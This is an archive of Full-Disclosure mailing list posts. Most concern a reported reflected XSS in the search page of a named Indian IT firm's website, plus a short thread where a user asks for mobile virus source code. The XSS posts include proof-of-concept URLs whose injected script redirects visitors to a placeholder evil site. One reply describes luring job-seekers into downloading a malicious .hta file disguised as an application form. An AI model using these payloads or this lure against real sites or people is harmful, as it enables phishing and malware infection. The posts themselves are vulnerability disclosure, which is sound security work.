Re: [Full-disclosure] MBT Xss vulnerability

2006-01-21 Thread MuNNa
Hii Bro,

I got the point.You meant to say that Xss for each and every site
should not be posted here, unless n until it attracts heavy traffic
like Yahoo etc. I agree to this that MBT doesnt attract that amount of
traffic normally but you can target millions of users at one go.
Like say...there are many groups that post new job vacancies everyday.
So if i create a url with _javascript_ allowing you to download a file
with say .hta extension and it claims itself to be some
form that has to be filled by victim in order to apply for job. 
For eg.
http://www.mahindrabt.com/jse/jsp/search.jsp?q=scriptdocument.location='www.evil.com/applicationform.hta'/script
If you post this URL in any of the above groups, you can be sure that
your file will be downloaded by thousands of users. This is
because MBT is one of the top employers. Believe me.

Before some one downloads such files and gets his machine compromised,
i just wanted to warn the users. As number of victims could be large
enough to create havoc, MBT's Xss vuln was of great concern to me.This
is what made me post this vuln over here. May be i might have posted it
in the wrong list. If this is the case, i am sory to cause annoyance to
you and others.

Regards;
Santosh J.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread MuNNa
Hahaha ... native code doesnt seem to understand the meaning of Xss and why it can be of security concern. Here not only url re-direction is possible but also execution of malicious _javascript_s is 
possible.Your Lame reply makes me think that you areone of the following:
1.An employee of MBT criticising me in the interest of the company 'or'
2.A poor spammer who doesnt know anything but tries to shows-off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future.

Regards;
Santosh J.
On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

Actually,Whats lame is you basing someone for telling others about asecurity vulnerability. Keep posting!
-Adriel-Original Message-From: Native.Code [EMAIL PROTECTED]To: MuNNa [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.ukSent: Thu, 19 Jan 2006 21:52:54 +0800Subject: Re: [Full-disclosure] MBT Xss vulnerabilityWhat a lame vulnerability it is. If your POC redirects to another
site (which is not MBT site), how someone will become victim andbelieve that he/she is doing business with MBT?Your post is yet another proof that FD is more and more inhibited byscipt kiddies. Get a life!
On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:Hii List;Recently, i found an Xss vulnerabilty in MBT web site. MBT offersservices from Consulting to Managed 
Services.It is the Corporate memberof The International Systems Security Engineering Association (ISSEA).BS 7799 (Information Security Management Framework) certifiedorganizationVulnerability:MBT XSS (Cross Site Scripting) Attacks
Criticality:MediumDescription:MBT ( http://www.mahindrabt.com/website/index.htm ) is a leadingIndia-based global IT solutions provider. As a proven leader in
application outsourcing and offshoring of business criticalapplications, MBT enables its clients, protect their investment inlegacy systems, enhance capital budgets, reduce operating expenses andbuild solutions for the multi-services future. However it suffers Xss
vulnerability on its own web page.Below is the proof-of-concept which explains this -http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss
 malcode here]Re-directing the site to any malicious or fake site to trap the victim :http://www.mahindrabt.com/jse/jsp/search.jsp?q=script
document.location='http://www.[evil.site].com'/scriptThough it does not affect sever side alot and may seem harmless, but itcan be used to target college students or job-seekers as it is one of
the most attracting employer. Targets can be lured to visit themalicious weblink under the pretext of some job positions being vacant.Vendor notification:Vendor has been notified twice, around 4 months ago but still there is
no response and I guess neither they are going to respond.Regards;Santosh J.___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/Check Out the new free AIM(R) Mail -- 2 GB of storage andindustry-leading spam and email virus protection.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread MuNNa
Hii

-Why would he be concerned? The problem is that most sites on theinternet suffer from XSS vulenrabilities, its just that nobody caresbecause there is nothing to gain from the sites. Nothing to gain you
say? Yes. Let's take this site you posted about for example, Ididn't look over the entire site, but glancing I don't even seeanything which XSS would help you compromise. The site seemingly isall static content (minus a search, correct me if I'm wrong) with no
e-mail portal, forums, or anything else that the XSS could beleveraged to gain access to. Since the site offeres no directservices (right?) what exactly could you trick people into doing here?The session cookie seems worthless since there's no login or
anything...

I have clearly mentioned inthe disclosure that this Xss is not harmful for server side but you can target a lot ofpeople, using this website. If you have completly read my disclosure mail, i have mentioned in the end that a lot of people seeking job can be targeted. I can say this because i know the value of this organisationfrompointof placements. Morever this organisation provides security solution to other companies. From the point of comapny's security everything is fine but from the point of its social image..



-Which would be meaningful if:A) this site were used by millions of peopleB) there was something worth compromising the site for (like access towebmail, personal information, etc...)
I think what I'm missing here is why this particular XSS is useful inany way shape or form? Am I missing something significant aboutthis site? Do people trust it for something?

As explained before , it can attract a lot of job-seekers. Millions of them. They trust this organisation. Even i do very much.

-Isn't that what you are doing?
Ijust posted a disclosure which i felt could be used by some bad guy to target innocent people.If anyone felt that this disclosure is some sort of spam and is really harmless, just discard it. Atleast i dont spam here by bashing someone else who has posted some disclosure. This bashing attitude reflects Lamer qualities and this discourages others from mailing disclosures.

Hope i answered all your answers. Lets cut down the argument here.
Regards;
Santosh J
On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:
 Hahaha ... native code doesnt seem to understand the meaning of Xss and why it can be of security concern. Here not only url re-direction is possibleWhy would he be concerned?The problem is that most sites on the
internet suffer from XSS vulenrabilities, its just that nobody caresbecause there is nothing to gain from the sites.Nothing to gain yousay?Yes.Let's take this site you posted about for example, Ididn't look over the entire site, but glancing I don't even see
anything which XSS would help you compromise.The site seemingly isall static content (minus a search, correct me if I'm wrong) with noe-mail portal, forums, or anything else that the XSS could beleveraged to gain access to.Since the site offeres no direct
services (right?) what exactly could you trick people into doing here?The session cookie seems worthless since there's no login oranything... but also execution of malicious _javascript_s is possible.Your
 Lame replyWhich would be meaningful if:A) this site were used by millions of peopleB) there was something worth compromising the site for (like access towebmail, personal information, etc...)I think what I'm missing here is why this particular XSS is useful in
any way shape or form?Am I missing something significant aboutthis site?Do people trust it for something? makes me think that you are one of the following: 1.An employee of MBT criticising me in the interest of the company 'or'
 2.A poor spammer who doesnt know anything but tries to shows-off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future.Isn't that what you are doing?
-sb Regards; Santosh J.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MBT Xss vulnerability

2006-01-19 Thread MuNNa
Hii List;

Recently, i found an Xss vulnerabilty in MBT web site. MBT offers
services from Consulting to Managed Services.It is the Corporate member
of The International Systems Security Engineering Association (ISSEA). 
BS 7799 (Information Security Management Framework) certified 
organization

Vulnerability: 

MBT XSS (Cross Site Scripting) Attacks

Criticality: 


Medium

Description:
MBT (http://www.mahindrabt.com/website/index.htm
) is a leading India-based global IT solutions provider. As a proven leader in 
application outsourcing and offshoring of business critical applications, MBT 
enables its clients, protect their investment in legacy systems, enhance capital 
budgets, reduce operating expenses and build solutions for the multi-services 
future. However it suffers Xss vulnerability on its own web page. 

Below is the proof-of-concept which explains this -


http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss
 malcode here]

Re-directing the site to any malicious or fake site to trap the victim
:

http://www.mahindrabt.com/jse/jsp/search.jsp?q=
scriptdocument.location='http://www.[evil.site].com'/script


Though it does not affect sever side alot and may seem harmless, but it can be used to target
college students or job-seekers as it is one of the most attracting
employer. Targets can be lured to visit the malicious weblink under the
pretext of some job positions being vacant.
Vendor notification: 

Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they
are going to respond. 



Regards;
Santosh J.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mobile Infection

2005-10-11 Thread Kaka Munna
got it guys. My post did not intend any offence. Maybe I was just so upset about the post. I did notice the POC word, but still everything else seemed so suspicious.

Peace.
On 10/11/05, Peer Janssen [EMAIL PROTECTED] wrote:
Kaka Munna wrote: Why would you like to do that?People do research for different purposes.
One reason can be know your ennemi in order to better defend yourself.How can you tell the difference regarding the intentions of somebody?Also, people can change. For instance, there are many examples of jerks
who turn good guys (tm).And people mature. Why not apply your security knowledge in creating good things (i.e. prevention mechanisms) instead of doing criminal things (i.e. creatingg viruses)?
You speak of security knowledge.Tinkering with security holes can be one way to acquire it.People like you should be doomed.Anybody who nourishes any bad intention dooms oneself.
I'm not sure there really is any need to add to that.And be careful not to judge anybody.You never know enough about the person to be just in your judgements.Everybody has some dark sides, you too I suppose.
And while dooming others, you still sign peace ??GreetingsPeer-Kaka Munna On 10/10/05, *Mark Sec* [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote: Alo folks, Well, im playing with some mobiles, this devices have system like WindowsCE, Symbiam. Blackberry...
 Im looking the binaries (.exe) or source code virus to do (PoCs) into the devices, obvious with the bluetooth active and vulnerable. I have this link (include the source code virus DUST for to
 WindowsCE) http://www.informit.com/articles/article.asp?p=337071rl=1 
http://www.informit.com/articles/article.asp?p=337071rl=1 does anyone have a links, source, binaries ofthe CABIR virus may be everything about to mobile virus?
 cheers :-) Mark. ___ Full-Disclosure - We believe in it. Charter: 
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Peace, 0x497266616E
  ___ Full-Disclosure - We believe in it. Charter: 
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
-- Peace,0x497266616E 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/